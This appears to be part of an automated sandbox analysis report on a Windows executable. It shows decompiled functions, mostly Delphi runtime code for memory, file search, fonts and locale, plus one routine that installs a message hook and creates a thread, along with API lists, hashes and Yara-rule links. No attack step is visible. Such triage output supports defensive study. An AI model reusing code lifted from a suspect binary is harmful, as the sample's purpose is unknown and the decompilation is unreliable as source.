                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,|8~,?,?,?,00401988), ref: 00401685
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$Free
                                                                        • String ID: |8~
                                                                        • API String ID: 3668210933-42510566
                                                                        • Opcode ID: 1701d776f782e39904b3b8996ef739fa462f12b6b9d7e1a0b955536b087e05e2
                                                                        • Instruction ID: 1e69f5fe43a740ff0071c7d4e860f39ca71c7f1fffdc7dfabefd4915b5c75808
                                                                        • Opcode Fuzzy Hash: 1701d776f782e39904b3b8996ef739fa462f12b6b9d7e1a0b955536b087e05e2
                                                                        • Instruction Fuzzy Hash: 92F0C8B27403106BEB319A694CC5F433AD89B45754F154176BE08FF3DAD6795800C66D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00408954, Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00408954(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E004045B0( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                                                        0x00408955
                                                                        0x00408958
                                                                        0x00408974
                                                                        0x0040896b
                                                                        0x00000000
                                                                        0x0040896d
                                                                        0x0040896d
                                                                        0x0040896d
                                                                        0x004089b3
                                                                        0x004089b6
                                                                        0x004089b6
                                                                        0x00408981
                                                                        0x00408990
                                                                        0x00408998
                                                                        0x0040899e
                                                                        0x004089ac
                                                                        0x004089b1
                                                                        0x00000000

                                                                        APIs
                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00408964
                                                                        • GetLastError.KERNEL32(?,?), ref: 0040896D
                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 00408981
                                                                        • FileTimeToDosDateTime.KERNEL32 ref: 00408990
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileTime$DateErrorFindLastLocalNext
                                                                        • String ID:
                                                                        • API String ID: 2103556486-0
                                                                        • Opcode ID: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction ID: 56775c696c456fa3967af653f38531e12ac447ffae477507b2a71b5a2badd77f
                                                                        • Opcode Fuzzy Hash: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction Fuzzy Hash: B2F012B25052019FCB44FF64C9C289737DC9B4431471085B7AD45DB287E638D558C7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454EF4, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00454EF4(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x496c04; // 0x2170d40
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x496c1c == 0) {
						_t2 = SetWindowsHookExA(3, E00454EB0, 0, GetCurrentThreadId());
						 *0x496c1c = _t2;
					}
					if( *0x496c18 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x496c18 = _t2;
					}
					if( *0x496c20 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00454E54, 0, 0, _t7);
						 *0x496c20 = _t2;
					}
				}
				return _t2;
			}





                                                                        0x00454ef5
                                                                        0x00454f01
                                                                        0x00454f0a
                                                                        0x00454f1c
                                                                        0x00454f21
                                                                        0x00454f21
                                                                        0x00454f2d
                                                                        0x00454f37
                                                                        0x00454f3c
                                                                        0x00454f3c
                                                                        0x00454f48
                                                                        0x00454f5b
                                                                        0x00454f60
                                                                        0x00454f60
                                                                        0x00454f48
                                                                        0x00454f66

                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F0C
                                                                        • SetWindowsHookExA.USER32 ref: 00454F1C
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00457722,?,?,02170D40,?,?,00457150,?), ref: 00454F37
                                                                        • CreateThread.KERNEL32(00000000,000003E8,00454E54,00000000,00000000), ref: 00454F5B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateThread$CurrentEventHookWindows
                                                                        • String ID:
                                                                        • API String ID: 1195359707-0
                                                                        • Opcode ID: fd125726600852bf513bec1e84033e9793126fea7cae9ee54921391b8d34fd8e
                                                                        • Instruction ID: 733cf5ddf0306959f392ce9496ddc13725008b47f7b701b11ded11e2ae76990f
                                                                        • Opcode Fuzzy Hash: fd125726600852bf513bec1e84033e9793126fea7cae9ee54921391b8d34fd8e
                                                                        • Instruction Fuzzy Hash: C0F03071A843006EF610AB15AD47F163694E364B1BF12403BFA447E1D2CBB914C48A5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401414, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 34memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00401414() {
				intOrPtr* _t4;
				intOrPtr _t6;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t14;

				if( *0x4965e0 != 0) {
					L5:
					_t4 =  *0x4965e0;
					 *0x4965e0 =  *_t4;
					return _t4;
				} else {
					_t12 = LocalAlloc(0, 0x644);
					if(_t12 != 0) {
						_t6 =  *0x4965dc; // 0x7e3258
						 *_t12 = _t6;
						 *0x4965dc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x4965e0;
							 *0x4965e0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}








                                                                        0x0040141e
                                                                        0x0040145a
                                                                        0x0040145a
                                                                        0x0040145e
                                                                        0x00401462
                                                                        0x00401420
                                                                        0x0040142c
                                                                        0x00401430
                                                                        0x00401437
                                                                        0x0040143c
                                                                        0x0040143e
                                                                        0x00401444
                                                                        0x00401446
                                                                        0x0040144a
                                                                        0x0040144a
                                                                        0x00401450
                                                                        0x00401452
                                                                        0x00401454
                                                                        0x00401455
                                                                        0x00000000
                                                                        0x00401432
                                                                        0x00401436
                                                                        0x00401436
                                                                        0x00401430

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000000,00000644,?,|8~,00401477,?,?,00401517,?,?,?,?,?,00401A57), ref: 00401427
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AllocLocal
                                                                        • String ID: X2~$\8~$|8~
                                                                        • API String ID: 3494564517-411482707
                                                                        • Opcode ID: e8ee80722d3608909681419b8e9b1611f32339c2b73c1c1b2140048558ca285b
                                                                        • Instruction ID: e1d5206ae986849e578dac9fde878a4848f712ee01075eebf6bd4668f3e0fae3
                                                                        • Opcode Fuzzy Hash: e8ee80722d3608909681419b8e9b1611f32339c2b73c1c1b2140048558ca285b
                                                                        • Instruction Fuzzy Hash: F6F082B17002119FDB14CF69E88065577E5EBA9329F21807FD585D73A0E7368C018B44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00423FFC, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 49%
                                                                        			E00423FFC(void* __eflags) {
				int _t14;
				intOrPtr _t20;
				void* _t21;

				DeleteObject( *(_t21 - 0x10));
				E00403DD0();
				E00403E24();
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x42404d);
				DeleteDC( *(_t21 - 0x1c));
				_t14 = ReleaseDC(0,  *(_t21 - 0x18));
				if( *(_t21 - 0x10) != 0) {
					return GetObjectA( *(_t21 - 0x10), 0x54,  *(_t21 + 0xc));
				}
				return _t14;
			}






                                                                        0x00424000
                                                                        0x00424005
                                                                        0x0042400a
                                                                        0x00424011
                                                                        0x00424014
                                                                        0x00424017
                                                                        0x00424020
                                                                        0x0042402b
                                                                        0x00424034
                                                                        0x00000000
                                                                        0x00424040
                                                                        0x00424045

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DeleteObject$Release
                                                                        • String ID:
                                                                        • API String ID: 2600533906-0
                                                                        • Opcode ID: d882ca4a59d74ba7fcd23cff5cfbfdf04719c013bf3bc46bbc777ebace02f49a
                                                                        • Instruction ID: 234183355323d449e4e0ea259c9d81100d714ff255df05ef953365b2e2b4a470
                                                                        • Opcode Fuzzy Hash: d882ca4a59d74ba7fcd23cff5cfbfdf04719c013bf3bc46bbc777ebace02f49a
                                                                        • Instruction Fuzzy Hash: 29E0C071A04115AADB10EBE5D846A7E77F8EF44305F41446AB610E71C1C67DA850C729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004072D8(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                                                        0x004072db
                                                                        0x004072e2
                                                                        0x004072e7
                                                                        0x004072ed
                                                                        0x004072f2

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Global$AllocHandleWire
                                                                        • String ID:
                                                                        • API String ID: 2210401237-0
                                                                        • Opcode ID: df11f4c69f4483118d121b3d8c8dbb1e2530246ed1590a5db0f886877fcb1417
                                                                        • Instruction ID: 259ab7e85c60211505b58427907bbc6fc2cc1ee7dc874fbd9d5750fb2c8aca08
                                                                        • Opcode Fuzzy Hash: df11f4c69f4483118d121b3d8c8dbb1e2530246ed1590a5db0f886877fcb1417
                                                                        • Instruction Fuzzy Hash: DEB009C4820222BCE80473B34C0BE3B289C9880B1C383497F3406B2C83987E982841BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004348FC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E004348FC(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x496b88 = __eax;
				_push(_t133);
				_push(0x434aa1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x496b90 = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E004037D8(__eax, __eflags);
					__eflags =  *0x496b88;
					if( *0x496b88 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E00433CD8(1, _t124);
							 *0x496b90 = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x4323f0; // 0x43243c
						_t54 = E00403768( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E00412BA4(0,  &_v36, 0, _t124, _t129);
								E004360C4(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								_t130 = _v12;
								_t125 =  *((intOrPtr*)(_v12 + 0x38));
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E00412BA4( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x4323f0; // 0x43243c
							_t71 = E00403768(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E0043CC2C(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0043478C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E004037D8(__eax, _t135);
				if( *0x496b88 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00433BC0(_t124, 1);
						 *0x496b90 = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}




























                                                                        0x004348fc
                                                                        0x00434905
                                                                        0x00434908
                                                                        0x0043490a
                                                                        0x0043490c
                                                                        0x00434914
                                                                        0x00434915
                                                                        0x0043491a
                                                                        0x0043491d
                                                                        0x00434922
                                                                        0x00434925
                                                                        0x0043492c
                                                                        0x00434933
                                                                        0x00434989
                                                                        0x0043498e
                                                                        0x00434995
                                                                        0x004349a4
                                                                        0x004349a8
                                                                        0x004349b8
                                                                        0x004349bb
                                                                        0x004349bb
                                                                        0x004349c5
                                                                        0x004349ca
                                                                        0x004349d0
                                                                        0x004349d5
                                                                        0x004349d7
                                                                        0x004349f5
                                                                        0x004349f8
                                                                        0x004349fc
                                                                        0x00434a29
                                                                        0x00434a2e
                                                                        0x00434a30
                                                                        0x00434a3d
                                                                        0x00434a42
                                                                        0x00434a48
                                                                        0x00434a4e
                                                                        0x00434a51
                                                                        0x00434a51
                                                                        0x00434a5a
                                                                        0x00434a63
                                                                        0x00434a69
                                                                        0x00434a6e
                                                                        0x00434a74
                                                                        0x00434a7a
                                                                        0x00000000
                                                                        0x00434a7a
                                                                        0x00434a00
                                                                        0x00434a06
                                                                        0x00434a0b
                                                                        0x00434a0d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434a13
                                                                        0x00434a18
                                                                        0x00434a1e
                                                                        0x00434a24
                                                                        0x00000000
                                                                        0x004349d9
                                                                        0x004349e8
                                                                        0x00434a7d
                                                                        0x00434a86
                                                                        0x00434a87
                                                                        0x00434a88
                                                                        0x00434a89
                                                                        0x00434a8a
                                                                        0x00434a92
                                                                        0x00434a99
                                                                        0x00434a9c
                                                                        0x00000000
                                                                        0x00434a9c
                                                                        0x004349d7
                                                                        0x00434999
                                                                        0x0043499c
                                                                        0x00000000
                                                                        0x0043499c
                                                                        0x0043493e
                                                                        0x0043494a
                                                                        0x00434959
                                                                        0x0043495d
                                                                        0x00434971
                                                                        0x00434974
                                                                        0x00434974
                                                                        0x00000000
                                                                        0x0043495d
                                                                        0x0043494e
                                                                        0x00434951
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <$C
                                                                        • API String ID: 0-3423417450
                                                                        • Opcode ID: fc7312295d466d1b6c2efc2a349e4abf85d9fbfa0e8825b772108cf843e98e7d
                                                                        • Instruction ID: c90d3436bb83f37f3896d1cde7c7445814aa3cbfde0b1555d2802c3bcb8cf98a
                                                                        • Opcode Fuzzy Hash: fc7312295d466d1b6c2efc2a349e4abf85d9fbfa0e8825b772108cf843e98e7d
                                                                        • Instruction Fuzzy Hash: 62517E74A042059FCB00DF69D841ADEBBF5FF98328F1190AAE804A7361D779B985CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041F478, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E0041F478(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41f601);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041F608);
					return E0040436C( &_v80, 3);
				} else {
					_t76 =  *0x496a74; // 0x2170658
					E0041E7FC(_t76);
					_push(_t137);
					_push(0x41f5d9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E004045A4( &_v72, _v8 + 0x1b);
						if(E0040864C(_v72, "Default") != 0) {
							E004045A4( &_v80, _v8 + 0x1b);
							E00408C90( &(_v68.lfFaceName), _v80);
						} else {
							E004045A4( &_v76, "\rMS Sans Serif");
							E00408C90( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041F75C(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41f5e0);
					_t81 =  *0x496a74; // 0x2170658
					return E0041E808(_t81);
				}
			}
















                                                                        0x0041f479
                                                                        0x0041f47b
                                                                        0x0041f481
                                                                        0x0041f484
                                                                        0x0041f487
                                                                        0x0041f48a
                                                                        0x0041f48e
                                                                        0x0041f48f
                                                                        0x0041f494
                                                                        0x0041f497
                                                                        0x0041f49d
                                                                        0x0041f4a7
                                                                        0x0041f5eb
                                                                        0x0041f5ee
                                                                        0x0041f600
                                                                        0x0041f4ad
                                                                        0x0041f4ad
                                                                        0x0041f4b2
                                                                        0x0041f4b9
                                                                        0x0041f4ba
                                                                        0x0041f4bf
                                                                        0x0041f4c2
                                                                        0x0041f4cc
                                                                        0x0041f4d8
                                                                        0x0041f4dd
                                                                        0x0041f4e2
                                                                        0x0041f4e7
                                                                        0x0041f4f1
                                                                        0x0041f4fc
                                                                        0x0041f4f3
                                                                        0x0041f4f3
                                                                        0x0041f4f3
                                                                        0x0041f50d
                                                                        0x0041f51a
                                                                        0x0041f527
                                                                        0x0041f530
                                                                        0x0041f53c
                                                                        0x0041f550
                                                                        0x0041f575
                                                                        0x0041f580
                                                                        0x0041f552
                                                                        0x0041f55a
                                                                        0x0041f565
                                                                        0x0041f565
                                                                        0x0041f585
                                                                        0x0041f589
                                                                        0x0041f58d
                                                                        0x0041f598
                                                                        0x0041f59a
                                                                        0x0041f5a2
                                                                        0x0041f59c
                                                                        0x0041f59e
                                                                        0x0041f5a8
                                                                        0x0041f5a0
                                                                        0x0041f5ae
                                                                        0x0041f5ae
                                                                        0x0041f59e
                                                                        0x0041f5be
                                                                        0x0041f5be
                                                                        0x0041f5c3
                                                                        0x0041f5c6
                                                                        0x0041f5c9
                                                                        0x0041f5ce
                                                                        0x0041f5d8
                                                                        0x0041f5d8

                                                                        APIs
                                                                          • Part of subcall function 0041E7FC: RtlEnterCriticalSection.KERNEL32(?,0041E839), ref: 0041E800
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateCriticalEnterFontIndirectSection
                                                                        • String ID: MS Sans Serif$Default
                                                                        • API String ID: 2931345757-2137701257
                                                                        • Opcode ID: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction ID: c6d3fcb0f525e24af73f531a10b58b6f758537922a732ded3b048f0f413673bb
                                                                        • Opcode Fuzzy Hash: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction Fuzzy Hash: 28516E30A04248DFDB01CFA9C541BCDBBF6AF49304F2580BAD804A7352D3789E96CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409A84, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00409A84(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x409b97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x496758;
				_t83 = 0x496788;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E00409A48(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E0040439C(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E00409A48(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E0040439C(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x4967b8;
				_t84 = 0x4967d4;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E00409A48(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E0040439C(_t87, _v24);
					E00409A48(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E0040439C(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E00409B9E);
				return E0040436C( &_v28, 4);
			}

















                                                                        0x00409a85
                                                                        0x00409a89
                                                                        0x00409a8a
